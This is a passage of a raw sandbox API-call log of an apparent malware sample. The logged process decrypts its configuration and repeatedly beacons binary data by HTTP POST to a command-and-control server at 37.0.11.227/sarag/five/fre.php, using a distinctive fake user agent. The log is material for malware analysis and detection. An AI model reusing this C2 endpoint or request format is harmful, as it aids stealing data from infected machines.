Flags=0x0, Size=0xf4) returned 0x6ad508 [0340.383] GetProcessHeap () returned 0x690000 [0340.383] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0340.383] send (s=0xc3c, buf=0x6ad508*, len=242, flags=0) returned 242 [0340.383] send (s=0xc3c, buf=0x6aba40*, len=159, flags=0) returned 159 [0340.386] GetProcessHeap () returned 0x690000 [0340.386] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0340.386] recv (in: s=0xc3c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0340.465] GetProcessHeap () returned 0x690000 [0340.466] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0340.466] GetProcessHeap () returned 0x690000 [0340.466] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0340.466] GetProcessHeap () returned 0x690000 [0340.467] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0100 | out: hHeap=0x690000) returned 1 [0340.467] GetProcessHeap () returned 0x690000 [0340.467] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aee58 | out: hHeap=0x690000) returned 1 [0340.467] closesocket (s=0xc3c) returned 0 [0340.468] GetProcessHeap () returned 0x690000 [0340.468] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab410 | out: hHeap=0x690000) returned 1 [0340.468] GetProcessHeap () returned 0x690000 [0340.469] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0340.469] GetProcessHeap () returned 0x690000 [0340.469] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0340.469] GetProcessHeap () returned 0x690000 [0340.470] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0340.470] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x198c) returned 0xc3c [0340.474] Sleep (dwMilliseconds=0xea60) [0340.475] GetProcessHeap () returned 0x690000 [0340.475] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0340.476] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.477] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0340.485] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.486] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0340.493] GetProcessHeap () returned 0x690000 [0340.493] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0340.493] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.494] CryptImportKey (in: hProv=0x6af188, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0340.495] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.495] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0340.496] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.496] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0340.496] GetProcessHeap () returned 0x690000 [0340.497] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0340.497] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.498] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0340.498] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.498] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0340.499] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.499] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0340.499] GetProcessHeap () returned 0x690000 [0340.499] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0340.500] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0340.500] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0340.501] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0340.501] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0340.502] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0340.502] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0340.503] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0340.503] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0340.503] GetProcessHeap () returned 0x690000 [0340.503] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0340.503] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0340.503] GetProcessHeap () returned 0x690000 [0340.504] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0340.510] GetProcessHeap () returned 0x690000 [0340.511] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0340.511] GetProcessHeap () returned 0x690000 [0340.511] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0340.511] GetProcessHeap () returned 0x690000 [0340.511] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0340.512] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.512] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0340.520] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.520] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0340.531] GetProcessHeap () returned 0x690000 [0340.531] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0340.531] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.532] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0340.532] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.533] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0340.533] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.533] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0340.534] GetProcessHeap () returned 0x690000 [0340.534] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0340.536] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.537] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0340.537] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.538] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0340.538] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.538] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0340.538] GetProcessHeap () returned 0x690000 [0340.539] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0340.539] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0340.540] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0340.540] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0340.540] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0340.541] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0340.541] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0340.542] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0340.542] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0340.542] GetProcessHeap () returned 0x690000 [0340.542] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0340.542] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0340.542] GetProcessHeap () returned 0x690000 [0340.542] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3b0 [0340.543] socket (af=2, type=1, protocol=6) returned 0xc40 [0340.543] connect (s=0xc40, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0340.577] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0340.577] GetProcessHeap () returned 0x690000 [0340.577] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0340.577] GetProcessHeap () returned 0x690000 [0340.577] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0340.578] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0340.579] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0340.579] GetProcessHeap () returned 0x690000 [0340.579] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af800 [0340.579] GetProcessHeap () returned 0x690000 [0340.580] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0340.580] GetProcessHeap () returned 0x690000 [0340.580] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0340.580] GetProcessHeap () returned 0x690000 [0340.580] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0340.581] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0340.581] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0340.581] GetProcessHeap () returned 0x690000 [0340.581] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0340.582] GetProcessHeap () returned 0x690000 [0340.582] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0340.582] send (s=0xc40, buf=0x6ad508*, len=242, flags=0) returned 242 [0340.584] send (s=0xc40, buf=0x6aba40*, len=159, flags=0) returned 159 [0340.584] GetProcessHeap () returned 0x690000 [0340.584] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0340.584] recv (in: s=0xc40, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0340.682] GetProcessHeap () returned 0x690000 [0340.683] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0340.683] GetProcessHeap () returned 0x690000 [0340.683] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0340.683] GetProcessHeap () returned 0x690000 [0340.683] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af800 | out: hHeap=0x690000) returned 1 [0340.684] GetProcessHeap () returned 0x690000 [0340.684] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0340.684] closesocket (s=0xc40) returned 0 [0340.685] GetProcessHeap () returned 0x690000 [0340.685] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3b0 | out: hHeap=0x690000) returned 1 [0340.685] GetProcessHeap () returned 0x690000 [0340.686] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0340.686] GetProcessHeap () returned 0x690000 [0340.686] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0340.686] GetProcessHeap () returned 0x690000 [0340.686] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0340.687] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1990) returned 0xc40 [0340.688] Sleep (dwMilliseconds=0xea60) [0340.690] GetProcessHeap () returned 0x690000 [0340.690] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0340.691] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.692] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0340.701] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.702] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0340.713] GetProcessHeap () returned 0x690000 [0340.713] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0340.720] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.720] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0340.721] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.722] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0340.722] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.723] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0340.723] GetProcessHeap () returned 0x690000 [0340.723] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0340.724] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.724] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0340.725] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.725] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0340.728] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.728] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0340.728] GetProcessHeap () returned 0x690000 [0340.728] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0340.729] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0340.729] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0340.730] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0340.731] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0340.731] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0340.732] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0340.732] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0340.733] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0340.733] GetProcessHeap () returned 0x690000 [0340.733] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0340.733] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0340.733] GetProcessHeap () returned 0x690000 [0340.734] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0340.734] GetProcessHeap () returned 0x690000 [0340.734] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0340.734] GetProcessHeap () returned 0x690000 [0340.734] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0340.735] GetProcessHeap () returned 0x690000 [0340.735] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0340.735] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.736] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0340.744] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.744] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0340.751] GetProcessHeap () returned 0x690000 [0340.751] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0340.751] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.752] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0340.753] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.753] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0340.754] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.754] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0340.754] GetProcessHeap () returned 0x690000 [0340.754] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0340.755] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.756] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0340.756] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.757] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0340.757] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0340.758] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0340.758] GetProcessHeap () returned 0x690000 [0340.758] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0340.759] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0340.762] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0340.763] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0340.765] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0340.766] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0340.766] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0340.767] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0340.767] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0340.767] GetProcessHeap () returned 0x690000 [0340.767] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0340.767] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0340.767] GetProcessHeap () returned 0x690000 [0340.767] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab380 [0340.767] socket (af=2, type=1, protocol=6) returned 0xc44 [0340.768] connect (s=0xc44, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0340.796] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0340.797] GetProcessHeap () returned 0x690000 [0340.797] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0340.797] GetProcessHeap () returned 0x690000 [0340.797] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0340.797] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0340.798] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0340.798] GetProcessHeap () returned 0x690000 [0340.798] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af800 [0340.798] GetProcessHeap () returned 0x690000 [0340.799] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0340.799] GetProcessHeap () returned 0x690000 [0340.799] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0340.799] GetProcessHeap () returned 0x690000 [0340.799] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0340.799] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0340.800] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0340.800] GetProcessHeap () returned 0x690000 [0340.800] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0340.800] GetProcessHeap () returned 0x690000 [0340.801] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0340.801] send (s=0xc44, buf=0x6ad508*, len=242, flags=0) returned 242 [0340.801] send (s=0xc44, buf=0x6aba40*, len=159, flags=0) returned 159 [0340.801] GetProcessHeap () returned 0x690000 [0340.801] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0340.801] recv (in: s=0xc44, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0340.874] GetProcessHeap () returned 0x690000 [0340.875] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0340.876] GetProcessHeap () returned 0x690000 [0340.876] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0340.877] GetProcessHeap () returned 0x690000 [0340.877] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af800 | out: hHeap=0x690000) returned 1 [0340.877] GetProcessHeap () returned 0x690000 [0340.877] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0340.878] closesocket (s=0xc44) returned 0 [0340.878] GetProcessHeap () returned 0x690000 